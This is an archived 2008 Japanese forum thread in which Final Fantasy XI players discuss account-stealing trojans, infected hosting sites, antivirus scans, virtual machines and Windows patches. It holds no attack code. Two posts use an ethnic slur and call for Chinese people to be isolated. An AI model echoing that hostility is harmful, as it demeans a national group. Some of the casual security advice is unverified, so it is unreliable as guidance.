C:\WINDOWS\SYSTEM32\smart.dllは
FFXIAHやらsomepage.comが感染源らしい。
NoScriptやFlashBlock入れろ書いてあるからFlash経由くさいね。

927 名前:既にその名前は使われています:2008/08/12(火) 23:58:04 ID:7gi2i432
>>924
VirusTotalはここねー.ここにそのdllそのものを送信すればおk.
http://www.virustotal.com/jp/

で,できれば対応状況が芳しくない場合にはウpロダにそのDllをうpしてほしいw

928 名前:既にその名前は使われています:2008/08/13(水) 00:09:30 ID:5R2NMXn/
smart.dllって正規dllもあった気がするからなんとも言えないけどTrojan-GameThief.Win32.WOW.bhtで検出されてるしねえ.
本来どの位置にあるdllなんだっけ?


929 名前:既にその名前は使われています:2008/08/13(水) 00:09:34 ID:H3MPT5aH
つうか、シナチク共を国際的に何とかしないと
ネット自体終了するよねこのままだと

気軽に家族でPC!なんてまじありえなくなってきた

930 名前:既にその名前は使われています:2008/08/13(水) 00:20:17 ID:eTPPv4uO
>>928
Windowsっていうか、システムにはありませんでした

931 名前:既にその名前は使われています:2008/08/13(水) 01:15:19 ID:MapesBam
以前このスレで紹介したPC上に仮想PCを作成してLinuxをインストールする過程を
説明した動画のLinuxインストール編が完成してた。PC1台で仮想環境作ろうとして
る人は参考にしたらどうでしょう?

Linuxをいじろう 01 (準備編)
http://www.nicovideo.jp/watch/sm4038618

(New!)
Linuxをいじろう 02 (インストール編)
http://www.nicovideo.jp/watch/sm4244861

932 名前:既にその名前は使われています:2008/08/13(水) 01:23:12 ID:o0I6qj53
質問失礼します
カスペルスキーでスキャンした結果
not-a-virus:AdWare.Win32.Mostofate.eq
が検知されたんですがすごい危険なものなのでしょうか?
あまりPCには詳しくないものでご教授お願いします

933 名前:既にその名前は使われています:2008/08/13(水) 01:24:27 ID:e+GDJdUw
>>932
まずnot-a-virusを和訳してみ

934 名前:既にその名前は使われています:2008/08/13(水) 01:26:08 ID:zJk+C6Id
>>932
その次はAdWareの和訳な!

935 名前:既にその名前は使われています:2008/08/13(水) 01:33:26 ID:o0I6qj53
>>933
ウィルスではなさそうですねw
今月初めに垢ハックにあってここを見ながら
いろいろ参考にさせていただいてるんですが
頻繁にスキャンに引っかかるので心配でした。
ありがとうございました

936 名前:既にその名前は使われています:2008/08/13(水) 01:47:33 ID:IL6TdfE+
>>929
ほんとだよなー 全世界的に奴等隔離でいいよもうw

937 名前:既にその名前は使われています:2008/08/13(水) 05:01:24 ID:MLXAPbu9
>>931
ニコニコは見れないんだけど、紹介を見るにVirtualBox+Vineか。

自分はVirtualBox+1CD Linuxも結構初心者向きかと思う。
VirtualBoxをインストして、1CD Linuxのイメージをマウントすればインストの必要なく
即効でNet閲覧環境は完成する。仮想PC上とはいえインストは結構かったるいから、
楽をしたい人やどうしても急いで安全な環境を求めたい人には向いていると思う。
無難なのを選ぶならKNOPPIXか。

とはいえ、UbuntuあたりはVirtualBox用の仮想ハードディスクイメージの配布ってのも
あるんで実はこれが一番楽かもしんない。

938 名前:既にその名前は使われています:2008/08/13(水) 05:32:11 ID:o7Vt0kax
>>931
お。これ参考に仮想PCやってみるわ・・・

仮想化はずっと考えてたんだけど、初心者には専門用語の敷居が結構高くてなー。
web閲覧だけで十分なんで参考にさせて頂きます。

939 名前:既にその名前は使われています:2008/08/13(水) 08:21:01 ID:h2eOHzit
Windows XP Update アゲ

940 名前:既にその名前は使われています:2008/08/13(水) 08:36:03 ID:xVFV/6oL
2008 年 8 月のセキュリティ情報
http://www.microsoft.com/japan/technet/security/bulletin/ms08-Aug.mspx

941 名前:既にその名前は使われています:2008/08/13(水) 08:36:07 ID:6puEHWWP
>>939
仮想環境自体は、PC操作にある程度なれてれば特別難しくは無いよ。
ちょっとだけドライブの割り当てがどうとか、メモリーがどうとか、音源最初はオフの可能性あるのでどうするかとか、
あるにはあるけど、マニュアルなり本もでわまってるしな。
設定いじらなくても普通に使えるけど、メモリー割り当ては見直さないと少なすぎる可能性はあるかな。

それよりリナックス自体のほうが100倍めんどいわ。
それも最近はインストール一発で簡単に使えるパッケージ多いから、
説明みながらやればそうそう詰まることも無いと思う。

リナックスが合わないならWindows入れてもいいしな。ライセンス別に必要になるけど。

942 名前:既にその名前は使われています:2008/08/13(水) 08:37:23 ID:6puEHWWP
>>940
Windowsの8月の定期アップデートが8/13きたね。
みなさんお忘れなく。

943 名前:既にその名前は使われています:2008/08/13(水) 09:03:57 ID:IEUjtBBV
火葬PCってのはつまり
自分の今動いてるウィンXPが動いているときに仮想PCソフトをインストールして
その仮想PCソフトの中で新しく買ってきたウィンドウズを動かすってこと?

944 名前:既にその名前は使われています:2008/08/13(水) 09:07:32 ID:xs0IX++X
カスペでwzcsvbxm.dll削除したんだけどクリーンインスコしなくても大丈夫?

945 名前:既にその名前は使われています:2008/08/13(水) 09:08:13 ID:q8jhh2Gh
したほうがいいお

946 名前:既にその名前は使われています:2008/08/13(水) 09:30:49 ID:6puEHWWP
>>943
そのとおり。

仮想PCってのは、今動いてるWindows上に、PCそのもののハードを、ソフトを使って無理やり再現してる。
エミュレータってやつね。

仮想的なPC本体そのものだから、WindowsだろうがリナックスだろうがMS−DOSだろうが何でも動く。
一部制限が有る場合もあるが。

947 名前:既にその名前は使われています:2008/08/13(水) 09:37:50 ID:h03LP505
virtualPCとVirtual Boxってどっちがいいのかね?
どうせブラウザとメールくらいしか試さないから軽めがいいのよね
まぁスレ違いですまんが

948 名前:既にその名前は使われています:2008/08/13(水) 09:41:39 ID:puOQghPM
感染前に↓のサイト見たんだけど安全か鑑定お願いします

http://coffer.hp■infoseek.co.jp/

949 名前:既にその名前は使われています:2008/08/13(水) 09:50:26 ID:+8ozkD6E
カスペルスキーのオンラインスキャンはIE限定ですか?
Firefoxだと承認と拒否の所で承認を押しても何も始まらないんですが

950 名前:既にその名前は使われています:2008/08/13(水) 09:52:09 ID:u3TiNuWO
>>949
http://www.kaspersky.co.jp/virusscanner

1000回くらい音読してこい

951 名前:既にその名前は使われています:2008/08/13(水) 09:53:50 ID:+8ozkD6E
>>950
IEを使用して〜ってのは見たんですけど
IE限定とは書いてないですよね?
で、IE限定なんですかね?

952 名前:既にその名前は使われています:2008/08/13(水) 09:57:30 ID:aCcD2ZT/
>>951

>MS Internet Explorer 6.0以上の環境でのみ動作可能です。

これが読めないのか?


953 名前:既にその名前は使われています:2008/08/13(水) 10:01:54 ID:+8ozkD6E
>>952
サンクス
さっきまで読めなかったけど今は読めました
書いてあるのは>>950のとこじゃなく承認の画面でしたね

954 名前:既にその名前は使われています:2008/08/13(水) 10:05:17 ID:aCcD2ZT/
>>953
おいおい、素直なヤツだなw
煽り口調ですまなかった。スキャン結果、何事もないといいな。

955 名前:既にその名前は使われています:2008/08/13(水) 10:24:08 ID:zJk+C6Id
IE Tabを入れておけばFireFoxでも動作するけど、まあどうでもいいか。

956 名前:既にその名前は使われています:2008/08/13(水) 10:30:24 ID:tqOcCmli
IETabは重いからなー。

957 名前:既にその名前は使われています:2008/08/13(水) 10:53:18 ID:puOQghPM
今日は何人待ち?

958 名前:既にその名前は使われています:2008/08/13(水) 10:57:40 ID:uPqebfMx
次スレの季節
1は できれば外部リンクは2以降にしたほうがいいと思うけど>>285あたり参考に 
FF11WARNINGが xreaだから悩むところ
鑑定依頼禁止も盛り込んでもらいたいですw

959 名前:既にその名前は使われています:2008/08/13(水) 11:14:29 ID:6P+GX4fF
もはや、FF専用PCとweb閲覧用PCと2台用意しないとダメだな

960 名前:既にその名前は使われています:2008/08/13(水) 11:30:55 ID:nnNsOLpx
>>959
携帯だけか小型の閲覧専用PCだけかで考えないともう無理だ
踏んでしまったが最後金銭面を含めて時間的な被害を問答無用で受ける
鯖が信用できない状態でクライアントができることは限られるし
正直手の打ちようがない

961 名前:既にその名前は使われています:2008/08/13(水) 11:35:13 ID:IEUjtBBV
>>957
3人くらいしかいない今がチャンス

962 名前:既にその名前は使われています:2008/08/13(水) 11:52:42 ID:JdfWwISV
FF専用PC+Macのオレに隙はなかった。

PCも対策してるけどそれでも心配なんだよね・・・
毎日ログアウトした後でPS2でパス変更してるわ。

963 名前:既にその名前は使われています:2008/08/13(水) 11:59:43 ID:9LQiu/Qk
>>962
そしてAtok fo rMACに付属していたUSBメモリー経由で感染してしまうんですね、分かります。

964 名前:既にその名前は使われています:2008/08/13(水) 12:05:29 ID:K3CECdBf
XREAの新型、昨夜更新。今回はリネージュ2のパス抜きの模様。
ttp://www.virustotal.com/analisis/e03e26a5993402b293ba3d3e8609a8c0

>>948
>>717 >>725

965 名前:既にその名前は使われています:2008/08/13(水) 12:26:08 ID:v8dkiEJN
最近XREAっちゅうのがウィルスのタイプ名に見えてきた
もう事業停止でいいよw

966 名前:既にその名前は使われています:2008/08/13(水) 13:06:51 ID:G9Cd433N
>>965
俺もw

967 名前:既にその名前は使われています:2008/08/13(水) 13:15:35 ID:nG58XW3+
マイクロソフト、8月の月例パッチ11件を公開
IEやOffice関連の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/08/13/20572.html

古いOfficeはMicrosoftUpdateでは出来ないので忘れずにOffice Updateのページに行ってやりましょう

968 名前:既にその名前は使われています:2008/08/13(水) 13:22:44 ID:hDl0Ae0x
Officeなんて自作PCに入れる奴いるのか

969 名前:既にその名前は使われています:2008/08/13(水) 14:00:02 ID:K3CECdBf
Viewerだけ入れてる人は多いかも

970 名前:既にその名前は使われています:2008/08/13(水) 15:09:42 ID:824i0OEZ
IPAセキュリティセンターおよび有限責任中間法人
JPCERTコーディネーションセンター(JPCERT/CC)は12日、
「『ウイルスセキュリティ』および『ウイルスセキュリティZERO』における
サービス運用妨害 (DoS) の脆弱性」を公表した。IPAセキュリティセンターは、
本件を「注意喚起」としている。ソースネクストが販売する
ウイルス対策ソフト「ウイルスセキュリティ」、
「ウイルスセキュリティZERO」に発見された脆弱性は以下の通り。

ファイルスキャン処理において圧縮ファイルの取り扱いに問題があり、
サービス運用妨害(DoS)状態となるセキュリティ上の脆弱性が存在する。
この脆弱性が悪用されると、「ウイルスセキュリティ」および
「ウイルスセキュリティZERO」のファイルスキャン処理が停止し、
以降ウイルスが検知できなくなる。
対策としては、ソースネクストより提供されるバージョンアップを
速やかに行うこととしている。

*+*+ マイコミジャーナル 2008/08/12[**:**] +*+*
http://journal.mycom.co.jp/news/2008/08/12/039/index.html

971 名前:既にその名前は使われています:2008/08/13(水) 17:07:07 ID:hDANwYFp
XREAでウィルスを拾うのもFlashPlayerの脆弱性が原因でしたっけ
どこかにレスがあった記憶なのですけど見つけられない・・・

972 名前:既にその名前は使われています:2008/08/13(水) 17:20:37 ID:OvTfPBeZ
フラッシュの更新してなくてハックされた。
その後フラッシュプレイヤーを最新にし、
最新のノートン先生でスキャンをかけてみるも、何もウィルスっぽいものはみつからず。
トラッキングクッキーは一応全部削除したんだが、この状態で巻き戻し処理しても
大丈夫だと思う?

973 名前:既にその名前は使われています:2008/08/13(水) 17:21:53 ID:6P+GX4fF
もうXREAとかFC2とか見ないようにしたほうがいい

974 名前:既にその名前は使われています:2008/08/13(水) 17:23:26 ID:e+GDJdUw
>>972
カスペのオンラインスキャンとかもやってみ
ノートン先生への過信は禁物
あと巻き戻し処理申請から復帰までにどうせ1ヶ月かかるからはやめにしる

975 名前:既にその名前は使われています:2008/08/13(水) 17:24:38 ID:QIGeDJw1
どうせ巻き戻しに時間かかるんだから
今のうちにクリーンインストールしろ

976 名前:既にその名前は使われています:2008/08/13(水) 17:25:02 ID:OvTfPBeZ
うーむそうか。 迅速レスありがとう。
やってみます。

977 名前:既にその名前は使われています:2008/08/13(水) 17:27:25 ID:71HZBy2R
>>973
火狐に581を入れると、踏んだURLにXREAが含まれてた時はいいかもな

978 名前:既にその名前は使われています:2008/08/13(水) 17:42:29 ID:G9Cd433N
今回のXREAは無料有料鯖関係ないっぽいのかな?

979 名前:既にその名前は使われています:2008/08/13(水) 18:09:16 ID:3kFkV7ym
今の所無料の方だけぽいが、安心は出来ないな

>>581入れても独自ドメインとかだと意味ないぜ

980 名前:既にその名前は使われています:2008/08/13(水) 18:11:27 ID:YxZvBUfX
FC2って一度対策施されてから、改ざん被害ってあったっけ?

981 名前:既にその名前は使われています:2008/08/13(水) 18:20:47 ID:qKCyMxq5
>>978
前回は無料の広告枠だが、
今回は有料がダイレクトでやられてる。

982 名前:既にその名前は使われています:2008/08/13(水) 18:26:42 ID:uPqebfMx
すれたてちゃれんじしてくる

983 名前:既にその名前は使われています:2008/08/13(水) 18:28:40 ID:uPqebfMx
だめだった ダレカタノムorz

984 名前:既にその名前は使われています:2008/08/13(水) 18:47:20 ID:hDANwYFp
立ててきます

985 名前:既にその名前は使われています:2008/08/13(水) 18:47:20 ID:aDXaMAwm
>>979
指摘しても分かってないから仕方ないな

986 名前:既にその名前は使われています:2008/08/13(水) 18:50:21 ID:hDANwYFp
●● RMT業者の垢ハックが多発している件36 ●●

★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします

前スレ ●● RMT業者の垢ハックが多発している件35 ●● http://changi.2ch.net/test/read.cgi/ogame/1217834363/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/

987 名前:既にその名前は使われています:2008/08/13(水) 18:51:16 ID:hDANwYFp
わたしもだめでした

↑テンプレ雛形です、どなたかお願いしますm(_ _)m

988 名前:既にその名前は使われています:2008/08/13(水) 18:58:16 ID:MgMLTT4Y
>>986
たてました。テンプレよくわからないので、必要なら貼ってね。

●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/

989 名前:既にその名前は使われています:2008/08/13(水) 19:05:15 ID:tKY7tQ/V
ochu!

990 名前:既にその名前は使われています:2008/08/13(水) 19:10:09 ID:oSdy9GCf
>>986
ユーザーの不注意でPOL外で勝手に感染してアカハックされてるのに
「スクエニに法的責任を!」なんて馬鹿なこと言ってるヤツがいるのか

991 名前:既にその名前は使われています:2008/08/13(水) 19:14:03 ID:/ZuZV7yr
>>990
それ垢ハックの件じゃねーから

992 名前:既にその名前は使われています:2008/08/13(水) 19:18:21 ID:e+GDJdUw
PG2の起動時のロゴ変わった?
今PC立ち上げて謎のロゴが出てびびったわー

993 名前:既にその名前は使われています:2008/08/13(水) 19:26:17 ID:tKY7tQ/V
みなさんWindowsUpdateですよー

994 名前:既にその名前は使われています:2008/08/13(水) 19:27:35 ID:evm7VLg3
>>992

起動ロゴって数種類あったような

995 名前:既にその名前は使われています:2008/08/13(水) 19:27:58 ID:5hdwDHgd
>>991
?????????????????????

996 名前:既にその名前は使われています:2008/08/13(水) 20:28:41 ID:wxF3nuFw
今のXERAのはどこから進入?
FP更新とウィンドウズアップデートしとけば大丈夫?

997 名前:既にその名前は使われています:2008/08/13(水) 20:39:37 ID:hDANwYFp
>>996
いまのはJavaScriptらしいです
ブラウズのJava実行を不許可にすることをおすすめです

998 名前:既にその名前は使われています:2008/08/13(水) 20:40:55 ID:+yDEIZqS
>>996
今のところはFP利用の罠だけど
今後もそれで大丈夫と判断するかは自己責任。
とりあえず置かれてるトロイは頻繁に更新されてる。

999 名前:既にその名前は使われています:2008/08/13(水) 20:42:24 ID:wxF3nuFw
情報ありがとうございます
とりあえずjavaは不許可&PG2&カスペなので安心

アンテナは常に張っておくようにします

●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/

1000 名前:既にその名前は使われています:2008/08/13(水) 20:47:19 ID:hDANwYFp
1000げっつ埋め

1001 名前:1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪



全部 最新50
DAT2HTML 0.35b Converted.